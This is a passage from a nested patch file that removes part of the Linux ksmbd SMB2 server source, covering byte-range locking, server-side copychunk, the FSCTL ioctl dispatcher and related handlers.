+-				if (work->state != KSMBD_WORK_ACTIVE) {
+-					list_del(&smb_lock->llist);
+-					spin_lock(&work->conn->llist_lock);
+-					list_del(&smb_lock->clist);
+-					spin_unlock(&work->conn->llist_lock);
+-					locks_free_lock(flock);
+-
+-					if (work->state == KSMBD_WORK_CANCELLED) {
+-						rsp->hdr.Status =
+-							STATUS_CANCELLED;
+-						kfree(smb_lock);
+-						smb2_send_interim_resp(work,
+-								       STATUS_CANCELLED);
+-						work->send_no_response = 1;
+-						goto out;
+-					}
+-					init_smb2_rsp_hdr(work);
+-					smb2_set_err_rsp(work);
+-					rsp->hdr.Status =
+-						STATUS_RANGE_NOT_LOCKED;
+-					kfree(smb_lock);
+-					goto out2;
+-				}
+-
+-				list_del(&smb_lock->llist);
+-				spin_lock(&work->conn->llist_lock);
+-				list_del(&smb_lock->clist);
+-				spin_unlock(&work->conn->llist_lock);
+-
+-				goto retry;
+-			} else if (!rc) {
+-				spin_lock(&work->conn->llist_lock);
+-				list_add_tail(&smb_lock->clist,
+-					      &work->conn->lock_list);
+-				list_add_tail(&smb_lock->flist,
+-					      &fp->lock_list);
+-				spin_unlock(&work->conn->llist_lock);
+-				list_add(&smb_lock->llist, &rollback_list);
+-				ksmbd_debug(SMB, "successful in taking lock\n");
+-			} else {
+-				goto out;
+-			}
+-		}
+-	}
+-
+-	if (atomic_read(&fp->f_ci->op_count) > 1)
+-		smb_break_all_oplock(work, fp);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	ksmbd_debug(SMB, "successful in taking lock\n");
+-	rsp->hdr.Status = STATUS_SUCCESS;
+-	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-out:
+-	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
+-		locks_free_lock(smb_lock->fl);
+-		list_del(&smb_lock->llist);
+-		kfree(smb_lock);
+-	}
+-
+-	list_for_each_entry_safe(smb_lock, tmp, &rollback_list, llist) {
+-		struct file_lock *rlock = NULL;
+-
+-		rlock = smb_flock_init(filp);
+-		rlock->fl_type = F_UNLCK;
+-		rlock->fl_start = smb_lock->start;
+-		rlock->fl_end = smb_lock->end;
+-
+-		rc = vfs_lock_file(filp, 0, rlock, NULL);
+-		if (rc)
+-			pr_err("rollback unlock fail : %d\n", rc);
+-
+-		list_del(&smb_lock->llist);
+-		spin_lock(&work->conn->llist_lock);
+-		if (!list_empty(&smb_lock->flist))
+-			list_del(&smb_lock->flist);
+-		list_del(&smb_lock->clist);
+-		spin_unlock(&work->conn->llist_lock);
+-
+-		locks_free_lock(smb_lock->fl);
+-		locks_free_lock(rlock);
+-		kfree(smb_lock);
+-	}
+-out2:
+-	ksmbd_debug(SMB, "failed in taking lock(flags : %x), err : %d\n", flags, err);
+-
+-	if (!rsp->hdr.Status) {
+-		if (err == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else if (err == -ENOMEM)
+-			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+-		else if (err == -ENOENT)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		else
+-			rsp->hdr.Status = STATUS_LOCK_NOT_GRANTED;
+-	}
+-
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-static int fsctl_copychunk(struct ksmbd_work *work,
+-			   struct copychunk_ioctl_req *ci_req,
+-			   unsigned int cnt_code,
+-			   unsigned int input_count,
+-			   unsigned long long volatile_id,
+-			   unsigned long long persistent_id,
+-			   struct smb2_ioctl_rsp *rsp)
+-{
+-	struct copychunk_ioctl_rsp *ci_rsp;
+-	struct ksmbd_file *src_fp = NULL, *dst_fp = NULL;
+-	struct srv_copychunk *chunks;
+-	unsigned int i, chunk_count, chunk_count_written = 0;
+-	unsigned int chunk_size_written = 0;
+-	loff_t total_size_written = 0;
+-	int ret = 0;
+-
+-	ci_rsp = (struct copychunk_ioctl_rsp *)&rsp->Buffer[0];
+-
+-	rsp->VolatileFileId = volatile_id;
+-	rsp->PersistentFileId = persistent_id;
+-	ci_rsp->ChunksWritten =
+-		cpu_to_le32(ksmbd_server_side_copy_max_chunk_count());
+-	ci_rsp->ChunkBytesWritten =
+-		cpu_to_le32(ksmbd_server_side_copy_max_chunk_size());
+-	ci_rsp->TotalBytesWritten =
+-		cpu_to_le32(ksmbd_server_side_copy_max_total_size());
+-
+-	chunks = (struct srv_copychunk *)&ci_req->Chunks[0];
+-	chunk_count = le32_to_cpu(ci_req->ChunkCount);
+-	if (chunk_count == 0)
+-		goto out;
+-	total_size_written = 0;
+-
+-	/* verify the SRV_COPYCHUNK_COPY packet */
+-	if (chunk_count > ksmbd_server_side_copy_max_chunk_count() ||
+-	    input_count < offsetof(struct copychunk_ioctl_req, Chunks) +
+-	     chunk_count * sizeof(struct srv_copychunk)) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		return -EINVAL;
+-	}
+-
+-	for (i = 0; i < chunk_count; i++) {
+-		if (le32_to_cpu(chunks[i].Length) == 0 ||
+-		    le32_to_cpu(chunks[i].Length) > ksmbd_server_side_copy_max_chunk_size())
+-			break;
+-		total_size_written += le32_to_cpu(chunks[i].Length);
+-	}
+-
+-	if (i < chunk_count ||
+-	    total_size_written > ksmbd_server_side_copy_max_total_size()) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		return -EINVAL;
+-	}
+-
+-	src_fp = ksmbd_lookup_foreign_fd(work,
+-					 le64_to_cpu(ci_req->ResumeKey[0]));
+-	dst_fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
+-	ret = -EINVAL;
+-	if (!src_fp ||
+-	    src_fp->persistent_id != le64_to_cpu(ci_req->ResumeKey[1])) {
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
+-		goto out;
+-	}
+-
+-	if (!dst_fp) {
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		goto out;
+-	}
+-
+-	/*
+-	 * FILE_READ_DATA should only be included in
+-	 * the FSCTL_COPYCHUNK case
+-	 */
+-	if (cnt_code == FSCTL_COPYCHUNK &&
+-	    !(dst_fp->daccess & (FILE_READ_DATA_LE | FILE_GENERIC_READ_LE))) {
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		goto out;
+-	}
+-
+-	ret = ksmbd_vfs_copy_file_ranges(work, src_fp, dst_fp,
+-					 chunks, chunk_count,
+-					 &chunk_count_written,
+-					 &chunk_size_written,
+-					 &total_size_written);
+-	if (ret < 0) {
+-		if (ret == -EACCES)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		if (ret == -EAGAIN)
+-			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-		else if (ret == -EBADF)
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		else if (ret == -EFBIG || ret == -ENOSPC)
+-			rsp->hdr.Status = STATUS_DISK_FULL;
+-		else if (ret == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else if (ret == -EISDIR)
+-			rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
+-		else if (ret == -E2BIG)
+-			rsp->hdr.Status = STATUS_INVALID_VIEW_SIZE;
+-		else
+-			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-	}
+-
+-	ci_rsp->ChunksWritten = cpu_to_le32(chunk_count_written);
+-	ci_rsp->ChunkBytesWritten = cpu_to_le32(chunk_size_written);
+-	ci_rsp->TotalBytesWritten = cpu_to_le32(total_size_written);
+-out:
+-	ksmbd_fd_put(work, src_fp);
+-	ksmbd_fd_put(work, dst_fp);
+-	return ret;
+-}
+-
+-static __be32 idev_ipv4_address(struct in_device *idev)
+-{
+-	__be32 addr = 0;
+-
+-	struct in_ifaddr *ifa;
+-
+-	rcu_read_lock();
+-	in_dev_for_each_ifa_rcu(ifa, idev) {
+-		if (ifa->ifa_flags & IFA_F_SECONDARY)
+-			continue;
+-
+-		addr = ifa->ifa_address;
+-		break;
+-	}
+-	rcu_read_unlock();
+-	return addr;
+-}
+-
+-static int fsctl_query_iface_info_ioctl(struct ksmbd_conn *conn,
+-					struct smb2_ioctl_rsp *rsp,
+-					unsigned int out_buf_len)
+-{
+-	struct network_interface_info_ioctl_rsp *nii_rsp = NULL;
+-	int nbytes = 0;
+-	struct net_device *netdev;
+-	struct sockaddr_storage_rsp *sockaddr_storage;
+-	unsigned int flags;
+-	unsigned long long speed;
+-
+-	rtnl_lock();
+-	for_each_netdev(&init_net, netdev) {
+-		bool ipv4_set = false;
+-
+-		if (netdev->type == ARPHRD_LOOPBACK)
+-			continue;
+-
+-		flags = dev_get_flags(netdev);
+-		if (!(flags & IFF_RUNNING))
+-			continue;
+-ipv6_retry:
+-		if (out_buf_len <
+-		    nbytes + sizeof(struct network_interface_info_ioctl_rsp)) {
+-			rtnl_unlock();
+-			return -ENOSPC;
+-		}
+-
+-		nii_rsp = (struct network_interface_info_ioctl_rsp *)
+-				&rsp->Buffer[nbytes];
+-		nii_rsp->IfIndex = cpu_to_le32(netdev->ifindex);
+-
+-		nii_rsp->Capability = 0;
+-		if (netdev->real_num_tx_queues > 1)
+-			nii_rsp->Capability |= cpu_to_le32(RSS_CAPABLE);
+-		if (ksmbd_rdma_capable_netdev(netdev))
+-			nii_rsp->Capability |= cpu_to_le32(RDMA_CAPABLE);
+-
+-		nii_rsp->Next = cpu_to_le32(152);
+-		nii_rsp->Reserved = 0;
+-
+-		if (netdev->ethtool_ops->get_link_ksettings) {
+-			struct ethtool_link_ksettings cmd;
+-
+-			netdev->ethtool_ops->get_link_ksettings(netdev, &cmd);
+-			speed = cmd.base.speed;
+-		} else {
+-			ksmbd_debug(SMB, "%s %s\n", netdev->name,
+-				    "speed is unknown, defaulting to 1Gb/sec");
+-			speed = SPEED_1000;
+-		}
+-
+-		speed *= 1000000;
+-		nii_rsp->LinkSpeed = cpu_to_le64(speed);
+-
+-		sockaddr_storage = (struct sockaddr_storage_rsp *)
+-					nii_rsp->SockAddr_Storage;
+-		memset(sockaddr_storage, 0, 128);
+-
+-		if (!ipv4_set) {
+-			struct in_device *idev;
+-
+-			sockaddr_storage->Family = cpu_to_le16(INTERNETWORK);
+-			sockaddr_storage->addr4.Port = 0;
+-
+-			idev = __in_dev_get_rtnl(netdev);
+-			if (!idev)
+-				continue;
+-			sockaddr_storage->addr4.IPv4address =
+-						idev_ipv4_address(idev);
+-			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
+-			ipv4_set = true;
+-			goto ipv6_retry;
+-		} else {
+-			struct inet6_dev *idev6;
+-			struct inet6_ifaddr *ifa;
+-			__u8 *ipv6_addr = sockaddr_storage->addr6.IPv6address;
+-
+-			sockaddr_storage->Family = cpu_to_le16(INTERNETWORKV6);
+-			sockaddr_storage->addr6.Port = 0;
+-			sockaddr_storage->addr6.FlowInfo = 0;
+-
+-			idev6 = __in6_dev_get(netdev);
+-			if (!idev6)
+-				continue;
+-
+-			list_for_each_entry(ifa, &idev6->addr_list, if_list) {
+-				if (ifa->flags & (IFA_F_TENTATIVE |
+-							IFA_F_DEPRECATED))
+-					continue;
+-				memcpy(ipv6_addr, ifa->addr.s6_addr, 16);
+-				break;
+-			}
+-			sockaddr_storage->addr6.ScopeId = 0;
+-			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
+-		}
+-	}
+-	rtnl_unlock();
+-
+-	/* zero if this is last one */
+-	if (nii_rsp)
+-		nii_rsp->Next = 0;
+-
+-	rsp->PersistentFileId = SMB2_NO_FID;
+-	rsp->VolatileFileId = SMB2_NO_FID;
+-	return nbytes;
+-}
+-
+-static int fsctl_validate_negotiate_info(struct ksmbd_conn *conn,
+-					 struct validate_negotiate_info_req *neg_req,
+-					 struct validate_negotiate_info_rsp *neg_rsp,
+-					 unsigned int in_buf_len)
+-{
+-	int ret = 0;
+-	int dialect;
+-
+-	if (in_buf_len < offsetof(struct validate_negotiate_info_req, Dialects) +
+-			le16_to_cpu(neg_req->DialectCount) * sizeof(__le16))
+-		return -EINVAL;
+-
+-	dialect = ksmbd_lookup_dialect_by_id(neg_req->Dialects,
+-					     neg_req->DialectCount);
+-	if (dialect == BAD_PROT_ID || dialect != conn->dialect) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (strncmp(neg_req->Guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE)) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (le16_to_cpu(neg_req->SecurityMode) != conn->cli_sec_mode) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (le32_to_cpu(neg_req->Capabilities) != conn->cli_cap) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	neg_rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
+-	memset(neg_rsp->Guid, 0, SMB2_CLIENT_GUID_SIZE);
+-	neg_rsp->SecurityMode = cpu_to_le16(conn->srv_sec_mode);
+-	neg_rsp->Dialect = cpu_to_le16(conn->dialect);
+-err_out:
+-	return ret;
+-}
+-
+-static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
+-					struct file_allocated_range_buffer *qar_req,
+-					struct file_allocated_range_buffer *qar_rsp,
+-					unsigned int in_count, unsigned int *out_count)
+-{
+-	struct ksmbd_file *fp;
+-	loff_t start, length;
+-	int ret = 0;
+-
+-	*out_count = 0;
+-	if (in_count == 0)
+-		return -EINVAL;
+-
+-	start = le64_to_cpu(qar_req->file_offset);
+-	length = le64_to_cpu(qar_req->length);
+-
+-	if (start < 0 || length < 0)
+-		return -EINVAL;
+-
+-	fp = ksmbd_lookup_fd_fast(work, id);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
+-				   qar_rsp, in_count, out_count);
+-	if (ret && ret != -E2BIG)
+-		*out_count = 0;
+-
+-	ksmbd_fd_put(work, fp);
+-	return ret;
+-}
+-
+-static int fsctl_pipe_transceive(struct ksmbd_work *work, u64 id,
+-				 unsigned int out_buf_len,
+-				 struct smb2_ioctl_req *req,
+-				 struct smb2_ioctl_rsp *rsp)
+-{
+-	struct ksmbd_rpc_command *rpc_resp;
+-	char *data_buf = (char *)&req->Buffer[0];
+-	int nbytes = 0;
+-
+-	rpc_resp = ksmbd_rpc_ioctl(work->sess, id, data_buf,
+-				   le32_to_cpu(req->InputCount));
+-	if (rpc_resp) {
+-		if (rpc_resp->flags == KSMBD_RPC_SOME_NOT_MAPPED) {
+-			/*
+-			 * set STATUS_SOME_NOT_MAPPED response
+-			 * for unknown domain sid.
+-			 */
+-			rsp->hdr.Status = STATUS_SOME_NOT_MAPPED;
+-		} else if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
+-			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-			goto out;
+-		} else if (rpc_resp->flags != KSMBD_RPC_OK) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			goto out;
+-		}
+-
+-		nbytes = rpc_resp->payload_sz;
+-		if (rpc_resp->payload_sz > out_buf_len) {
+-			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-			nbytes = out_buf_len;
+-		}
+-
+-		if (!rpc_resp->payload_sz) {
+-			rsp->hdr.Status =
+-				STATUS_UNEXPECTED_IO_ERROR;
+-			goto out;
+-		}
+-
+-		memcpy((char *)rsp->Buffer, rpc_resp->payload, nbytes);
+-	}
+-out:
+-	kvfree(rpc_resp);
+-	return nbytes;
+-}
+-
+-static inline int fsctl_set_sparse(struct ksmbd_work *work, u64 id,
+-				   struct file_sparse *sparse)
+-{
+-	struct ksmbd_file *fp;
+-	struct user_namespace *user_ns;
+-	int ret = 0;
+-	__le32 old_fattr;
+-
+-	fp = ksmbd_lookup_fd_fast(work, id);
+-	if (!fp)
+-		return -ENOENT;
+-	user_ns = file_mnt_user_ns(fp->filp);
+-
+-	old_fattr = fp->f_ci->m_fattr;
+-	if (sparse->SetSparse)
+-		fp->f_ci->m_fattr |= FILE_ATTRIBUTE_SPARSE_FILE_LE;
+-	else
+-		fp->f_ci->m_fattr &= ~FILE_ATTRIBUTE_SPARSE_FILE_LE;
+-
+-	if (fp->f_ci->m_fattr != old_fattr &&
+-	    test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
+-		struct xattr_dos_attrib da;
+-
+-		ret = ksmbd_vfs_get_dos_attrib_xattr(user_ns,
+-						     fp->filp->f_path.dentry, &da);
+-		if (ret <= 0)
+-			goto out;
+-
+-		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+-		ret = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						     fp->filp->f_path.dentry, &da);
+-		if (ret)
+-			fp->f_ci->m_fattr = old_fattr;
+-	}
+-
+-out:
+-	ksmbd_fd_put(work, fp);
+-	return ret;
+-}
+-
+-static int fsctl_request_resume_key(struct ksmbd_work *work,
+-				    struct smb2_ioctl_req *req,
+-				    struct resume_key_ioctl_rsp *key_rsp)
+-{
+-	struct ksmbd_file *fp;
+-
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	memset(key_rsp, 0, sizeof(*key_rsp));
+-	key_rsp->ResumeKey[0] = req->VolatileFileId;
+-	key_rsp->ResumeKey[1] = req->PersistentFileId;
+-	ksmbd_fd_put(work, fp);
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_ioctl() - handler for smb2 ioctl command
+- * @work:	smb work containing ioctl command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_ioctl(struct ksmbd_work *work)
+-{
+-	struct smb2_ioctl_req *req;
+-	struct smb2_ioctl_rsp *rsp;
+-	unsigned int cnt_code, nbytes = 0, out_buf_len, in_buf_len;
+-	u64 id = KSMBD_NO_FID;
+-	struct ksmbd_conn *conn = work->conn;
+-	int ret = 0;
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		req = ksmbd_req_buf_next(work);
+-		rsp = ksmbd_resp_buf_next(work);
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-		}
+-	} else {
+-		req = smb2_get_msg(work->request_buf);
+-		rsp = smb2_get_msg(work->response_buf);
+-	}
+-
+-	if (!has_file_id(id))
+-		id = req->VolatileFileId;
+-
+-	if (req->Flags != cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL)) {
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-		goto out;
+-	}
+-
+-	cnt_code = le32_to_cpu(req->CtlCode);
+-	ret = smb2_calc_max_out_buf_len(work, 48,
+-					le32_to_cpu(req->MaxOutputResponse));
+-	if (ret < 0) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		goto out;
+-	}
+-	out_buf_len = (unsigned int)ret;
+-	in_buf_len = le32_to_cpu(req->InputCount);
+-
+-	switch (cnt_code) {
+-	case FSCTL_DFS_GET_REFERRALS:
+-	case FSCTL_DFS_GET_REFERRALS_EX:
+-		/* Not support DFS yet */
+-		rsp->hdr.Status = STATUS_FS_DRIVER_REQUIRED;
+-		goto out;
+-	case FSCTL_CREATE_OR_GET_OBJECT_ID:
+-	{
+-		struct file_object_buf_type1_ioctl_rsp *obj_buf;
+-
+-		nbytes = sizeof(struct file_object_buf_type1_ioctl_rsp);
+-		obj_buf = (struct file_object_buf_type1_ioctl_rsp *)
+-			&rsp->Buffer[0];
+-
+-		/*
+-		 * TODO: This is dummy implementation to pass smbtorture
+-		 * Need to check correct response later
+-		 */
+-		memset(obj_buf->ObjectId, 0x0, 16);
+-		memset(obj_buf->BirthVolumeId, 0x0, 16);
+-		memset(obj_buf->BirthObjectId, 0x0, 16);
+-		memset(obj_buf->DomainId, 0x0, 16);
+-
+-		break;
+-	}
+-	case FSCTL_PIPE_TRANSCEIVE:
+-		out_buf_len = min_t(u32, KSMBD_IPC_MAX_PAYLOAD, out_buf_len);
+-		nbytes = fsctl_pipe_transceive(work, id, out_buf_len, req, rsp);
+-		break;
+-	case FSCTL_VALIDATE_NEGOTIATE_INFO:
+-		if (conn->dialect < SMB30_PROT_ID) {
+-			ret = -EOPNOTSUPP;
+-			goto out;
+-		}
+-
+-		if (in_buf_len < offsetof(struct validate_negotiate_info_req,
+-					  Dialects)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (out_buf_len < sizeof(struct validate_negotiate_info_rsp)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_validate_negotiate_info(conn,
+-			(struct validate_negotiate_info_req *)&req->Buffer[0],
+-			(struct validate_negotiate_info_rsp *)&rsp->Buffer[0],
+-			in_buf_len);
+-		if (ret < 0)
+-			goto out;
+-
+-		nbytes = sizeof(struct validate_negotiate_info_rsp);
+-		rsp->PersistentFileId = SMB2_NO_FID;
+-		rsp->VolatileFileId = SMB2_NO_FID;
+-		break;
+-	case FSCTL_QUERY_NETWORK_INTERFACE_INFO:
+-		ret = fsctl_query_iface_info_ioctl(conn, rsp, out_buf_len);
+-		if (ret < 0)
+-			goto out;
+-		nbytes = ret;
+-		break;
+-	case FSCTL_REQUEST_RESUME_KEY:
+-		if (out_buf_len < sizeof(struct resume_key_ioctl_rsp)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_request_resume_key(work, req,
+-					       (struct resume_key_ioctl_rsp *)&rsp->Buffer[0]);
+-		if (ret < 0)
+-			goto out;
+-		rsp->PersistentFileId = req->PersistentFileId;
+-		rsp->VolatileFileId = req->VolatileFileId;
+-		nbytes = sizeof(struct resume_key_ioctl_rsp);
+-		break;
+-	case FSCTL_COPYCHUNK:
+-	case FSCTL_COPYCHUNK_WRITE:
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			ret = -EACCES;
+-			goto out;
+-		}
+-
+-		if (in_buf_len < sizeof(struct copychunk_ioctl_req)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (out_buf_len < sizeof(struct copychunk_ioctl_rsp)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		nbytes = sizeof(struct copychunk_ioctl_rsp);
+-		rsp->VolatileFileId = req->VolatileFileId;
+-		rsp->PersistentFileId = req->PersistentFileId;
+-		fsctl_copychunk(work,
+-				(struct copychunk_ioctl_req *)&req->Buffer[0],
+-				le32_to_cpu(req->CtlCode),
+-				le32_to_cpu(req->InputCount),
+-				req->VolatileFileId,
+-				req->PersistentFileId,
+-				rsp);
+-		break;
+-	case FSCTL_SET_SPARSE:
+-		if (in_buf_len < sizeof(struct file_sparse)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_set_sparse(work, id,
+-				       (struct file_sparse *)&req->Buffer[0]);
+-		if (ret < 0)
+-			goto out;
+-		break;
+-	case FSCTL_SET_ZERO_DATA:
+-	{
+-		struct file_zero_data_information *zero_data;
+-		struct ksmbd_file *fp;
+-		loff_t off, len, bfz;
+-
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			ret = -EACCES;
+-			goto out;
+-		}
+-
+-		if (in_buf_len < sizeof(struct file_zero_data_information)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		zero_data =
+-			(struct file_zero_data_information *)&req->Buffer[0];
+-
+-		off = le64_to_cpu(zero_data->FileOffset);
+-		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
+-		if (off < 0 || bfz < 0 || off > bfz) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		len = bfz - off;
+-		if (len) {
+-			fp = ksmbd_lookup_fd_fast(work, id);
+-			if (!fp) {
+-				ret = -ENOENT;
+-				goto out;
+-			}
+-
+-			ret = ksmbd_vfs_zero_data(work, fp, off, len);
+-			ksmbd_fd_put(work, fp);
+-			if (ret < 0)
+-				goto out;
+-		}
+-		break;
+-	}
+-	case FSCTL_QUERY_ALLOCATED_RANGES:
+-		if (in_buf_len < sizeof(struct file_allocated_range_buffer)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_query_allocated_ranges(work, id,
+-			(struct file_allocated_range_buffer *)&req->Buffer[0],
+-			(struct file_allocated_range_buffer *)&rsp->Buffer[0],
+-			out_buf_len /
+-			sizeof(struct file_allocated_range_buffer), &nbytes);
+-		if (ret == -E2BIG) {
+-			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-		} else if (ret < 0) {
+-			nbytes = 0;
+-			goto out;
+-		}
+-
+-		nbytes *= sizeof(struct file_allocated_range_buffer);
+-		break;
+-	case FSCTL_GET_REPARSE_POINT:
+-	{
+-		struct reparse_data_buffer *reparse_ptr;
+-		struct ksmbd_file *fp;
+-
+-		reparse_ptr = (struct reparse_data_buffer *)&rsp->Buffer[0];
+-		fp = ksmbd_lookup_fd_fast(work, id);
+-		if (!fp) {
+-			pr_err("not found fp!!\n");
+-			ret = -ENOENT;
+-			goto out;
+-		}
+-
+-		reparse_ptr->ReparseTag =
+-			smb2_get_reparse_tag_special_file(file_inode(fp->filp)->i_mode);
+-		reparse_ptr->ReparseDataLength = 0;
+-		ksmbd_fd_put(work, fp);
+-		nbytes = sizeof(struct reparse_data_buffer);
+-		break;
+-	}
+-	case FSCTL_DUPLICATE_EXTENTS_TO_FILE:
+-	{
+-		struct ksmbd_file *fp_in, *fp_out = NULL;
+-		struct duplicate_extents_to_file *dup_ext;
+-		loff_t src_off, dst_off, length, cloned;
+-
+-		if (in_buf_len < sizeof(struct duplicate_extents_to_file)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		dup_ext = (struct duplicate_extents_to_file *)&req->Buffer[0];
+-
+-		fp_in = ksmbd_lookup_fd_slow(work, dup_ext->VolatileFileHandle,
+-					     dup_ext->PersistentFileHandle);
+-		if (!fp_in) {
+-			pr_err("not found file handle in duplicate extent to file\n");
+-			ret = -ENOENT;
+-			goto out;
+-		}
+-
+-		fp_out = ksmbd_lookup_fd_fast(work, id);
+-		if (!fp_out) {
+-			pr_err("not found fp\n");
+-			ret = -ENOENT;
+-			goto dup_ext_out;
+-		}
+-
+-		src_off = le64_to_cpu(dup_ext->SourceFileOffset);
+-		dst_off = le64_to_cpu(dup_ext->TargetFileOffset);
+-		length = le64_to_cpu(dup_ext->ByteCount);
+-		/*
+-		 * XXX: It is not clear if FSCTL_DUPLICATE_EXTENTS_TO_FILE
+-		 * should fall back to vfs_copy_file_range().  This could be
+-		 * beneficial when re-exporting nfs/smb mount, but note that
+-		 * this can result in partial copy that returns an error status.
+-		 * If/when FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX is implemented,
+-		 * fall back to vfs_copy_file_range(), should be avoided when
+-		 * the flag DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC is set.
+-		 */
+-		cloned = vfs_clone_file_range(fp_in->filp, src_off,
+-					      fp_out->filp, dst_off, length, 0);
+-		if (cloned == -EXDEV || cloned == -EOPNOTSUPP) {
+-			ret = -EOPNOTSUPP;
+-			goto dup_ext_out;
+-		} else if (cloned != length) {
+-			cloned = vfs_copy_file_range(fp_in->filp, src_off,
+-						     fp_out->filp, dst_off,
+-						     length, 0);
+-			if (cloned != length) {
+-				if (cloned < 0)
+-					ret = cloned;
+-				else
+-					ret = -EINVAL;
+-			}
+-		}
+-
+-dup_ext_out:
+-		ksmbd_fd_put(work, fp_in);
+-		ksmbd_fd_put(work, fp_out);
+-		if (ret < 0)
+-			goto out;
+-		break;
+-	}
+-	default:
+-		ksmbd_debug(SMB, "not implemented yet ioctl command 0x%x\n",
+-			    cnt_code);
+-		ret = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	rsp->CtlCode = cpu_to_le32(cnt_code);
+-	rsp->InputCount = cpu_to_le32(0);
+-	rsp->InputOffset = cpu_to_le32(112);
+-	rsp->OutputOffset = cpu_to_le32(112);
+-	rsp->OutputCount = cpu_to_le32(nbytes);
+-	rsp->StructureSize = cpu_to_le16(49);
+-	rsp->Reserved = cpu_to_le16(0);
+-	rsp->Flags = cpu_to_le32(0);
+-	rsp->Reserved2 = cpu_to_le32(0);
+-	inc_rfc1001_len(work->response_buf, 48 + nbytes);
+-
+-	return 0;
+-
+-out:
+-	if (ret == -EACCES)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (ret == -ENOENT)
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
+-	else if (ret == -EOPNOTSUPP)
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-	else if (ret == -ENOSPC)
+-		rsp->hdr.Status = STATUS_BUFFER_TOO_SMALL;
+-	else if (ret < 0 || rsp->hdr.Status == 0)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	smb2_set_err_rsp(work);
+-	return 0;
+-}
+-
+-/**
+- * smb20_oplock_break_ack() - handler for smb2.0 oplock break command
+- * @work:	smb work containing oplock break command buffer
+- *
+- * Return:	0
+- */
+-static void smb20_oplock_break_ack(struct ksmbd_work *work)
+-{
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_file *fp;
